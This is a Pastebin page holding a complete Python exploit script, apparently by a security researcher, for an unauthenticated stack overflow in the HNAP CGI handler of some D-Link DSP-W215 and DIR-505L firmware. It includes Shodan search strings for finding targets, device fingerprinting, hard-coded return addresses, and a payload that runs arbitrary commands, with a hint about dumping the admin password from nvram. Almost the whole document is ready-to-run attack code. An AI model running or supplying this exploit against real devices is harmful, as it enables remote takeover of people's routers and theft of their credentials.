Guest User

Untitled

a guest
May 15th, 2014
3,430
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. # Unauthenticated stack overflow exploit that affects multiple D-Link products:
  3. #
  4. #   o D-Link DSP-W215 hardware v1, firmware v1.00
  5. #   o D-Link DIR-505L hardware v1/2, firmware v1.06/1.07
  6. #
  7. # Shodan Dorks:
  8. #
  9. #   o lighttpd/1.4.28-devel-4618M  
  10. #   o lighttpd/1.4.28-devel-2866M              
  11. #
  12. # The my_cgi.cgi CGI page responsible for handling HNAP requests reads
  13. # Content-Length bytes into a fixed-size stack buffer.
  14. #
  15. # This exploit returns to .text to execute system() with a user-supplied
  16. # command string (hint: try 'nvram get admin_user_pwd'). Output from the
  17. # command will be returned to the user.
  18. #
  19. # Craig Heffner
  20. # 2014-05-09
  21.  
  22. import sys
  23. import urllib2
  24.  
  25. class Device(object):
  26.    
  27.     def __init__(self, model, version, size, ra):
  28.         self.model = model
  29.         self.version = version
  30.         self.size = size
  31.         self.ra = ra
  32.  
  33.         self.model_html = "<ModelName>%s" % self.model
  34.         self.version_html = "<FirmwareVersion>%s" % self.version
  35.  
  36.     def match(self, html):
  37.         return (self.model_html in html and self.version_html in html)
  38.  
  39. class Vulnerability(object):
  40.  
  41.     DEFAULT_COMMAND = 'nvram show'
  42.  
  43.     VULNERABLE_DEVICES = [
  44.             Device("DIR-505", "1.06", 30000, "\x00\x40\x52\x34"),
  45.             Device("DIR-505", "1.07", 30000, "\x00\x40\x5C\x5C"),
  46.             Device("DSP-W215", "1.00", 1000000, "\x00\x40\x5C\xAC"),
  47.     ]
  48.  
  49.     def __init__(self, target, verbose=True):
  50.         self.verbose = verbose
  51.         self.target = target
  52.         self.url = "%s/HNAP1/" % self.target
  53.         if '://' not in self.url:
  54.             self.url = 'http://' + self.url
  55.         self._debug_message("Exploit URL: %s" % self.url)
  56.  
  57.     def _debug_message(self, msg):
  58.         if self.verbose:
  59.             print "[+] %s" % msg
  60.  
  61.     def _debug_error(self, err):
  62.         if self.verbose:
  63.             print "[-] %s" % err
  64.  
  65.     def _build_exploit(self, device, command):
  66.         # Return to .text section to execute system() with an arbitrary command string
  67.         buf =  "D" * device.size  # Fill up the stack buffer
  68.         buf += "B" * 4            # $s0, don't care
  69.         buf += "B" * 4            # $s1, don't care
  70.         buf += "B" * 4            # $s2, don't care
  71.         buf += "B" * 4            # $s3, don't care
  72.         buf += "B" * 4            # $s4, don't care
  73.         buf += device.ra          # $ra
  74.         buf += "C" * 0x28         # Stack filler
  75.         buf += command            # Command to execute
  76.         buf += "\x00"             # NULL-terminate the command
  77.         return buf
  78.  
  79.     def _request(self, data=None):
  80.         req = urllib2.Request(self.url, data)
  81.         try:
  82.             data = urllib2.urlopen(req).read()
  83.         except urllib2.HTTPError as e:
  84.             data = ""
  85.  
  86.             if e.code == 500:
  87.                 self._debug_message("CGI page crashed with no output (this may or may not be a good thing)!")
  88.             else:
  89.                 self._debug_error("Unexpected response: %s" % (str(e)))
  90.  
  91.         return data
  92.  
  93.     def fingerprint(self):
  94.         hnap_info = self._request()
  95.  
  96.         for device in self.VULNERABLE_DEVICES:
  97.             if device.match(hnap_info):
  98.                 self._debug_message("Identified target as %s v%s" % (device.model, device.version))
  99.                 return device
  100.  
  101.         self._debug_error("Could not identify target!")
  102.         return None
  103.  
  104.     def execute(self, device, command=DEFAULT_COMMAND):
  105.         self._debug_message("Executing exploit [%s] against %s [%s v%s]" % (command, self.target, device.model, device.version))
  106.         return self._request(self._build_exploit(device, command))
  107.        
  108.     def exploit(self, command=DEFAULT_COMMAND):
  109.         device = self.fingerprint()
  110.         if device:
  111.             return self.execute(device, command)
  112.         else:
  113.             return ""
  114.  
  115. if __name__ == "__main__":
  116.     if len(sys.argv) != 3:  
  117.         print "Usage: %s <target ip> <command to execute>" % sys.argv[0]
  118.         sys.exit(1)
  119.  
  120.     target = sys.argv[1]
  121.     command = sys.argv[2]
  122.  
  123.     print "\n" + Vulnerability(target).exploit(command)
RAW Paste Data